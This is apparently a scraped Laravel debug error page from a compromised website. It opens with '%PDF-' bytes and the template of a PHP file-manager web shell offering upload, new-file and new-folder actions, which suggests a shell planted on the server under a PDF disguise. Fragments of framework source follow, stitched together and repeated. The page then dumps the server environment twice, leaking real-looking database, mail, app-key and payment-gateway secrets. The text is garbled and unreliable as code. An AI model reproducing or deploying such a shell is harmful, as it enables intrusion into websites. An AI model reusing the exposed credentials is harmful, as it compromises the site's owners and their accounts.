%PDF- %PDF-
<title><?= $shellName ?></title>
</head>
<body>
<div class="container-lg">
<nav class="navbar navbar-light bg-light">
<div class="container-fluid">
<a class="navbar-brand" href="?">
<img src="<?= $logo ?>" alt="logo" width="30" height="24" class="d-inline-block align-text-top">
<?= $shellName ?>
</a>
</div>
</nav>
<?php if (isset($_SESSION['message'])) : ?>
<div class="alert alert-<?= $_SESSION['class'] ?> alert-dismissible fade show my-3" role="alert">
<strong><?= $_SESSION['status'] ?>!</strong> <?= $_SESSION['message'] ?>
<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>
<?php endif; clear(); ?>
<div id="tool">
<div class="d-flex justify-content-center flex-wrap my-3">
<a href="?" class="m-1 btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfile" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-file-plus"></i> New File</a>
<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfolder" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-folder-plus"></i> New Folder</a>
</div>
<div class="row">
<div class="col-md-12">
<div class="collapse" id="upload" data-bs-parent="#tool">
<div class="card card-body border-dark mb-3">
<div class="row">
<div class="col-md-6">
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group">
<input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
<button class="btn btn-outline-dark" type="submit" id="inputGroupFileAddon04">Upload</button>
</div>
"Call to undefined function clear()"
/**
* Load the configuration items from all of the files.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @param \Illuminate\Contracts\Config\Repository $repository
* @return void
*
* @throws \Exception
*/
protected function loadConfigurationFiles(Application $app, RepositoryContract $repository)
{
$files = $this->getConfigurationFiles($app);
if (! isset($files['app'])) {
throw new Exception('Unable to load the "app" configuration file.');
}
foreach ($files as $key => $path) {
$repository->set($key, require $path);
}
}
/**
* Get all of the configuration files for the application.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @return array
*/
protected function getConfigurationFiles(Application $app)
{
$files = [];
$configPath = realpath($app->configPath());
foreach (Finder::create()->files()->name('*.php')->in($configPath) as $file) {
$directory = $this->getNestedDirectory($file, $configPath);
$files[$directory.basename($file->getRealPath(), '.php')] = $file->getRealPath();
}
public function bootstrap(Application $app)
{
$items = [];
// First we will see if we have a cache configuration file. If we do, we'll load
// the configuration items from that file so that it is very quick. Otherwise
// we will need to spin through every configuration file and load them all.
if (file_exists($cached = $app->getCachedConfigPath())) {
$items = require $cached;
$loadedFromCache = true;
}
// Next we will spin through all of the configuration files in the configuration
// directory and load each one into the repository. This will make all of the
// options available to the developer for use in various parts of this app.
$app->instance('config', $config = new Repository($items));
if (! isset($loadedFromCache)) {
$this->loadConfigurationFiles($app, $config);
}
// Finally, we will set the application's environment based on the configuration
// values that were loaded. We will pass a callback which will be used to get
// the environment in a web context where an "--env" switch is not present.
$app->detectEnvironment(function () use ($config) {
return $config->get('app.env', 'production');
});
date_default_timezone_set($config->get('app.timezone', 'UTC'));
mb_internal_encoding('UTF-8');
}
/**
* Load the configuration items from all of the files.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @param \Illuminate\Contracts\Config\Repository $repository
* @return void
{
$this->register(new EventServiceProvider($this));
$this->register(new LogServiceProvider($this));
$this->register(new RoutingServiceProvider($this));
}
/**
* Run the given array of bootstrap classes.
*
* @param string[] $bootstrappers
* @return void
*/
public function bootstrapWith(array $bootstrappers)
{
$this->hasBeenBootstrapped = true;
foreach ($bootstrappers as $bootstrapper) {
$this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
$this->make($bootstrapper)->bootstrap($this);
$this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
}
}
/**
* Register a callback to run after loading the environment.
*
* @param \Closure $callback
* @return void
*/
public function afterLoadingEnvironment(Closure $callback)
{
$this->afterBootstrapping(
LoadEnvironmentVariables::class, $callback
);
}
/**
* Register a callback to run before a bootstrapper.
Illuminate\Foundation\Application {#2}
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
}
/**
* Bootstrap the application for HTTP requests.
*
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
* Get the route dispatcher callback.
*
* @return \Closure
*/
protected function dispatchToRouter()
{
return function ($request) {
$this->app->instance('request', $request);
return $this->router->dispatch($request);
};
}
/**
* Call the terminate method on any terminable middleware.
*
array:6 [ 0 => "Illuminate\Foundation\Bootstrap\LoadEnvironmentVariables" 1 => "Illuminate\Foundation\Bootstrap\LoadConfiguration" 2 => "Illuminate\Foundation\Bootstrap\HandleExceptions" 3 => "Illuminate\Foundation\Bootstrap\RegisterFacades" 4 => "Illuminate\Foundation\Bootstrap\RegisterProviders" 5 => "Illuminate\Foundation\Bootstrap\BootProviders" ]
$this->app['events']->dispatch(
new RequestHandled($request, $response)
);
return $response;
}
/**
* Send the given request through the middleware / router.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
protected function sendRequestThroughRouter($request)
{
$this->app->instance('request', $request);
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
}
/**
* Bootstrap the application for HTTP requests.
*
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
public function __construct(Application $app, Router $router)
{
$this->app = $app;
$this->router = $router;
$this->syncMiddlewareToRouter();
}
/**
* Handle an incoming HTTP request.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function handle($request)
{
try {
$request->enableHttpMethodParameterOverride();
$response = $this->sendRequestThroughRouter($request);
} catch (Throwable $e) {
$this->reportException($e);
$response = $this->renderException($request, $e);
}
$this->app['events']->dispatch(
new RequestHandled($request, $response)
);
return $response;
}
/**
* Send the given request through the middleware / router.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
protected function sendRequestThroughRouter($request)
Illuminate\Http\Request {#47 +attributes: Symfony\Component\HttpFoundation\ParameterBag {#49} +request: Symfony\Component\HttpFoundation\InputBag {#55} +query: Symfony\Component\HttpFoundation\InputBag {#55} +server: Symfony\Component\HttpFoundation\ServerBag {#51} +files: Symfony\Component\HttpFoundation\FileBag {#52} +cookies: Symfony\Component\HttpFoundation\InputBag {#50} +headers: Symfony\Component\HttpFoundation\HeaderBag {#53} #content: null #languages: null #charsets: null #encodings: null #acceptableContentTypes: array:1 [ 0 => "*/*" ] #pathInfo: null #requestUri: null #baseUrl: null #basePath: null #method: null #format: null #session: null #locale: null #defaultLocale: "en" -preferredFormat: null -isHostValid: true -isForwardedValid: true -isSafeContentPreferred: null #json: null #convertedFiles: null #userResolver: null #routeResolver: null : "/" : "/" : "" : "" : "GET" : "html" }
require __DIR__.'/../vendor/autoload.php';
/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/
$app = require_once __DIR__.'/../bootstrap/app.php';
$kernel = $app->make(Kernel::class);
$response = tap($kernel->handle(
$request = Request::capture()
))->send();
$kernel->terminate($request, $response);
Illuminate\Http\Request {#47 +attributes: Symfony\Component\HttpFoundation\ParameterBag {#49} +request: Symfony\Component\HttpFoundation\InputBag {#55} +query: Symfony\Component\HttpFoundation\InputBag {#55} +server: Symfony\Component\HttpFoundation\ServerBag {#51} +files: Symfony\Component\HttpFoundation\FileBag {#52} +cookies: Symfony\Component\HttpFoundation\InputBag {#50} +headers: Symfony\Component\HttpFoundation\HeaderBag {#53} #content: null #languages: null #charsets: null #encodings: null #acceptableContentTypes: array:1 [ 0 => "*/*" ] #pathInfo: null #requestUri: null #baseUrl: null #basePath: null #method: null #format: null #session: null #locale: null #defaultLocale: "en" -preferredFormat: null -isHostValid: true -isForwardedValid: true -isSafeContentPreferred: null #json: null #convertedFiles: null #userResolver: null #routeResolver: null : "/" : "/" : "" : "" : "GET" : "html" }
<?php
/**
* Laravel - A PHP Framework For Web Artisans
*
* @author Taylor Otwell <taylor@laravel.com>
*/
$uri = urldecode(
parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH)
);
// This file allows us to emulate Apache's "mod_rewrite" functionality from the
// built-in PHP web server. This provides a convenient way to test a Laravel
// application without having installed a "real" web server software here.
if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) {
return false;
}
require_once __DIR__.'/public/index.php';
"/home/chipsgalaxy/public_html/eve.chipsfinder.com/public/index.php"
| Key | Value |
| USER | "chipsgalaxy"
|
| HOME | "/home/chipsgalaxy"
|
| SCRIPT_NAME | "/index.php"
|
| REQUEST_URI | "/"
|
| QUERY_STRING | "" |
| REQUEST_METHOD | "GET"
|
| SERVER_PROTOCOL | "HTTP/1.0"
|
| GATEWAY_INTERFACE | "CGI/1.1"
|
| REMOTE_PORT | "52214"
|
| SCRIPT_FILENAME | "/home/chipsgalaxy/public_html/eve.chipsfinder.com/index.php"
|
| SERVER_ADMIN | "webmaster@eve.chipsfinder.com.chipsgalaxy.com"
|
| CONTEXT_DOCUMENT_ROOT | "/home/chipsgalaxy/public_html/eve.chipsfinder.com"
|
| CONTEXT_PREFIX | "" |
| REQUEST_SCHEME | "https"
|
| DOCUMENT_ROOT | "/home/chipsgalaxy/public_html/eve.chipsfinder.com"
|
| REMOTE_ADDR | "216.73.216.219"
|
| SERVER_PORT | "443"
|
| SERVER_ADDR | "172.31.30.199"
|
| SERVER_NAME | "eve.chipsfinder.com"
|
| SERVER_SOFTWARE | "Apache"
|
| SERVER_SIGNATURE | "" |
| PATH | "/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin"
|
| HTTP_X_HTTPS | "1"
|
| HTTP_USER_AGENT | "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
|
| HTTP_ACCEPT | "*/*"
|
| HTTP_X_REAL_IP | "216.73.216.219"
|
| HTTP_X_FORWARDED_SERVER | "eve.chipsfinder.com"
|
| HTTP_X_FORWARDED_PROTO | "https"
|
| HTTP_X_FORWARDED_PORT | "443"
|
| HTTP_X_FORWARDED_HOST | "eve.chipsfinder.com"
|
| HTTP_X_FORWARDED_FOR | "216.73.216.219"
|
| HTTP_HOST | "eve.chipsfinder.com"
|
| proxy-nokeepalive | "1"
|
| SSL_TLS_SNI | "eve.chipsfinder.com"
|
| HTTPS | "on"
|
| SCRIPT_URI | "https://eve.chipsfinder.com/"
|
| SCRIPT_URL | "/"
|
| isproxyrequest | "1"
|
| UNIQUE_ID | "aTdrXol7_KrB2PPzikiDfQAAACg"
|
| FCGI_ROLE | "RESPONDER"
|
| PHP_SELF | "/index.php"
|
| REQUEST_TIME_FLOAT | 1765239646.2823
|
| REQUEST_TIME | 1765239646
|
| argv | [] |
| argc | 0
|
| APP_NAME | "SCI Email Outreach - Project Python"
|
| APP_ENV | "local"
|
| APP_KEY | "base64:s0n2QculBRdadQzoYt9ifDtCV0PpMxnoIX2BhxRClsI="
|
| APP_DEBUG | "true"
|
| APP_URL | "https://eve.chipsfinder.com"
|
| AUTHOR | "SoftTech IT"
|
| VERSION | "6.5.5"
|
| DEFAULT_LANGUAGE | "en"
|
| TEST_CONNECTION_MAIL | "" |
| TEST_CONNECTION_SMS | "" |
| APP_INSTALL | "YES"
|
| DEMO_MODE | "NO"
|
| TIMEZONE | "Asia/Singapore"
|
| ACTIVE_THEME | "argon"
|
| DEFAULT_THEME | "argon"
|
| LOG_CHANNEL | "stack"
|
| DB_CONNECTION | "mysql"
|
| DB_HOST | "localhost"
|
| DB_PORT | "3306"
|
| DB_DATABASE | "chipsgalaxy_maildoll"
|
| DB_USERNAME | "chipsgalaxy_maildoll"
|
| DB_PASSWORD | "Admin@2013"
|
| TENANT_DATABASE | "chipsgalaxy_maildoll"
|
| TENANT_USERNAME | "chipsgalaxy_maildoll"
|
| TENANT_PASSWORD | "Admin@2013"
|
| DEFAULT_MAIL | "" |
| MAIL_MAILER | "smtp"
|
| MAIL_HOST | "smtp.office365.com"
|
| MAIL_PORT | "587"
|
| MAIL_USERNAME | "dev@supremecomponents.com"
|
| MAIL_PASSWORD | "Kog96895"
|
| MAIL_ENCRYPTION | "tls"
|
| MAIL_FROM_ADDRESS | "dev@supremecomponents.com"
|
| MAIL_FROM_NAME | "Tech Nitin"
|
| BROADCAST_DRIVER | "log"
|
| CACHE_DRIVER | "file"
|
| QUEUE_CONNECTION | "database"
|
| SESSION_DRIVER | "file"
|
| SESSION_LIFETIME | "120"
|
| REDIS_HOST | "127.0.0.1"
|
| REDIS_PASSWORD | "null"
|
| REDIS_PORT | "6379"
|
| AWS_ACCESS_KEY_ID | "" |
| AWS_SECRET_ACCESS_KEY | "" |
| AWS_DEFAULT_REGION | "us-east-1"
|
| AWS_BUCKET | "" |
| PUSHER_APP_ID | "" |
| PUSHER_APP_KEY | "" |
| PUSHER_APP_SECRET | "" |
| PUSHER_APP_CLUSTER | "mt1"
|
| MIX_PUSHER_APP_KEY | "" |
| MIX_PUSHER_APP_CLUSTER | "mt1"
|
| STRIPE_KEY | "pk_test_"
|
| STRIPE_SECRET | "sk_test_"
|
| STRIPE_PAYMENT | "YES"
|
| PAYPAL_CLIENT_ID | "" |
| PAYPAL_SECRET | "" |
| PAYPAL_MODE | "sandbox"
|
| PAYPAL_PAYMENT | "NO"
|
| KHALTI_KEY | "test_public_key_"
|
| KHALTI_SECRET | "test_secret_key_"
|
| KHALTI_PAYMENT | "YES"
|
| SENTRY_LARAVEL_DSN | "https://4fccb6bb4f54400baf4432e7e44410f7@o516263.ingest.sentry.io/5622456"
|
| SENTRY_TRACES_SAMPLE_RATE | "1"
|
| EDITOR_STYLE | "1"
|
| CSV_API | "466254a5-8ebb-44bf-98f9-26be610ca6b8"
|
| SAAS_KEY | "$2a$12$pkLmD5jZdxd6bSNcTg9YT.g2mXz5gS8JTArdIg68c8RK/d7w2y2Gu"
|
| SAAS_ACTIVE | "NO"
|
| DB_PREFIX | "" |
| YOUR_DOMAIN | "eve.chipsfinder.com"
|
| API_URL | "eve.chipsfinder.com"
|
| VOICE_ACTIVE | "NO"
|
| DISABLE_THEME | "YES"
|
| ADMIN_SMS_CONFIG | "YES"
|
| MARKETPLACE | "YES"
|
| CSV_VIEWER | "YES"
|
| LAO_ACTIVE | "NO"
|
| AAKASH_ACTIVE | "NO"
|
| SAMPLE_TEMPLATES | "YES"
|
| FLW_PUBLIC_KEY | "FLWPUBK_TEST"
|
| FLW_SECRET_KEY | "FLWSECK_TEST"
|
| FLW_SECRET_HASH | "FLWSECK_TEST37f66b5ad995"
|
| FLW_CURRENCY | "NGN"
|
| FLW_PAYMENT | "YES"
|
| IM_API_KEY | "test_"
|
| IM_AUTH_TOKEN | "test_"
|
| IM_URL | "" |
| IM_PAYMENT | "YES"
|
| PAYSTACK_PUBLIC_KEY | "pk_test_"
|
| PAYSTACK_SECRET_KEY | "sk_test_"
|
| PAYSTACK_PAYMENT_URL | "https://api.paystack.co"
|
| PAYSTACK_PAYMENT | "YES"
|
| MERCHANT_EMAIL | "mprince2k16@gmail.com"
|
| MERCHANT_CURRENCY | "ZAR"
|
| RAZORPAY_KEY | "rzp_test_vYLUhaqny75Hyj"
|
| RAZORPAY_SECRET | "qGdRYD6MnnPqZw0e2qoPvI52"
|
| RAZORPAY | "YES"
|
| MOLLIE_KEY | "test_"
|
| MOLLIE_PARTNER_ID | "" |
| MOLLIE_PROFILE_ID | "pfl_"
|
| MOLLIE | "YES"
|
| PAYTM | "NO"
|
| PAYTM_ENVIRONMENT | "local"
|
| PAYTM_MERCHANT_ID | "DIY12386817555501617"
|
| PAYTM_MERCHANT_KEY | "bKMfNxPPf_QdZppa"
|
| PAYTM_WEBSITE | "DIYtestingweb"
|
| PAYTM_CHANNEL | "WEB"
|
| PAYTM_INDUSTRY_TYPE | "Retail"
|
| PAYTM_MERCHANT_CURRENCY | "INR"
|
| Key | Value |
| APP_NAME | "SCI Email Outreach - Project Python"
|
| APP_ENV | "local"
|
| APP_KEY | "base64:s0n2QculBRdadQzoYt9ifDtCV0PpMxnoIX2BhxRClsI="
|
| APP_DEBUG | "true"
|
| APP_URL | "https://eve.chipsfinder.com"
|
| AUTHOR | "SoftTech IT"
|
| VERSION | "6.5.5"
|
| DEFAULT_LANGUAGE | "en"
|
| TEST_CONNECTION_MAIL | "" |
| TEST_CONNECTION_SMS | "" |
| APP_INSTALL | "YES"
|
| DEMO_MODE | "NO"
|
| TIMEZONE | "Asia/Singapore"
|
| ACTIVE_THEME | "argon"
|
| DEFAULT_THEME | "argon"
|
| LOG_CHANNEL | "stack"
|
| DB_CONNECTION | "mysql"
|
| DB_HOST | "localhost"
|
| DB_PORT | "3306"
|
| DB_DATABASE | "chipsgalaxy_maildoll"
|
| DB_USERNAME | "chipsgalaxy_maildoll"
|
| DB_PASSWORD | "Admin@2013"
|
| TENANT_DATABASE | "chipsgalaxy_maildoll"
|
| TENANT_USERNAME | "chipsgalaxy_maildoll"
|
| TENANT_PASSWORD | "Admin@2013"
|
| DEFAULT_MAIL | "" |
| MAIL_MAILER | "smtp"
|
| MAIL_HOST | "smtp.office365.com"
|
| MAIL_PORT | "587"
|
| MAIL_USERNAME | "dev@supremecomponents.com"
|
| MAIL_PASSWORD | "Kog96895"
|
| MAIL_ENCRYPTION | "tls"
|
| MAIL_FROM_ADDRESS | "dev@supremecomponents.com"
|
| MAIL_FROM_NAME | "Tech Nitin"
|
| BROADCAST_DRIVER | "log"
|
| CACHE_DRIVER | "file"
|
| QUEUE_CONNECTION | "database"
|
| SESSION_DRIVER | "file"
|
| SESSION_LIFETIME | "120"
|
| REDIS_HOST | "127.0.0.1"
|
| REDIS_PASSWORD | "null"
|
| REDIS_PORT | "6379"
|
| AWS_ACCESS_KEY_ID | "" |
| AWS_SECRET_ACCESS_KEY | "" |
| AWS_DEFAULT_REGION | "us-east-1"
|
| AWS_BUCKET | "" |
| PUSHER_APP_ID | "" |
| PUSHER_APP_KEY | "" |
| PUSHER_APP_SECRET | "" |
| PUSHER_APP_CLUSTER | "mt1"
|
| MIX_PUSHER_APP_KEY | "" |
| MIX_PUSHER_APP_CLUSTER | "mt1"
|
| STRIPE_KEY | "pk_test_"
|
| STRIPE_SECRET | "sk_test_"
|
| STRIPE_PAYMENT | "YES"
|
| PAYPAL_CLIENT_ID | "" |
| PAYPAL_SECRET | "" |
| PAYPAL_MODE | "sandbox"
|
| PAYPAL_PAYMENT | "NO"
|
| KHALTI_KEY | "test_public_key_"
|
| KHALTI_SECRET | "test_secret_key_"
|
| KHALTI_PAYMENT | "YES"
|
| SENTRY_LARAVEL_DSN | "https://4fccb6bb4f54400baf4432e7e44410f7@o516263.ingest.sentry.io/5622456"
|
| SENTRY_TRACES_SAMPLE_RATE | "1"
|
| EDITOR_STYLE | "1"
|
| CSV_API | "466254a5-8ebb-44bf-98f9-26be610ca6b8"
|
| SAAS_KEY | "$2a$12$pkLmD5jZdxd6bSNcTg9YT.g2mXz5gS8JTArdIg68c8RK/d7w2y2Gu"
|
| SAAS_ACTIVE | "NO"
|
| DB_PREFIX | "" |
| YOUR_DOMAIN | "eve.chipsfinder.com"
|
| API_URL | "eve.chipsfinder.com"
|
| VOICE_ACTIVE | "NO"
|
| DISABLE_THEME | "YES"
|
| ADMIN_SMS_CONFIG | "YES"
|
| MARKETPLACE | "YES"
|
| CSV_VIEWER | "YES"
|
| LAO_ACTIVE | "NO"
|
| AAKASH_ACTIVE | "NO"
|
| SAMPLE_TEMPLATES | "YES"
|
| FLW_PUBLIC_KEY | "FLWPUBK_TEST"
|
| FLW_SECRET_KEY | "FLWSECK_TEST"
|
| FLW_SECRET_HASH | "FLWSECK_TEST37f66b5ad995"
|
| FLW_CURRENCY | "NGN"
|
| FLW_PAYMENT | "YES"
|
| IM_API_KEY | "test_"
|
| IM_AUTH_TOKEN | "test_"
|
| IM_URL | "" |
| IM_PAYMENT | "YES"
|
| PAYSTACK_PUBLIC_KEY | "pk_test_"
|
| PAYSTACK_SECRET_KEY | "sk_test_"
|
| PAYSTACK_PAYMENT_URL | "https://api.paystack.co"
|
| PAYSTACK_PAYMENT | "YES"
|
| MERCHANT_EMAIL | "mprince2k16@gmail.com"
|
| MERCHANT_CURRENCY | "ZAR"
|
| RAZORPAY_KEY | "rzp_test_vYLUhaqny75Hyj"
|
| RAZORPAY_SECRET | "qGdRYD6MnnPqZw0e2qoPvI52"
|
| RAZORPAY | "YES"
|
| MOLLIE_KEY | "test_"
|
| MOLLIE_PARTNER_ID | "" |
| MOLLIE_PROFILE_ID | "pfl_"
|
| MOLLIE | "YES"
|
| PAYTM | "NO"
|
| PAYTM_ENVIRONMENT | "local"
|
| PAYTM_MERCHANT_ID | "DIY12386817555501617"
|
| PAYTM_MERCHANT_KEY | "bKMfNxPPf_QdZppa"
|
| PAYTM_WEBSITE | "DIYtestingweb"
|
| PAYTM_CHANNEL | "WEB"
|
| PAYTM_INDUSTRY_TYPE | "Retail"
|
| PAYTM_MERCHANT_CURRENCY | "INR"
|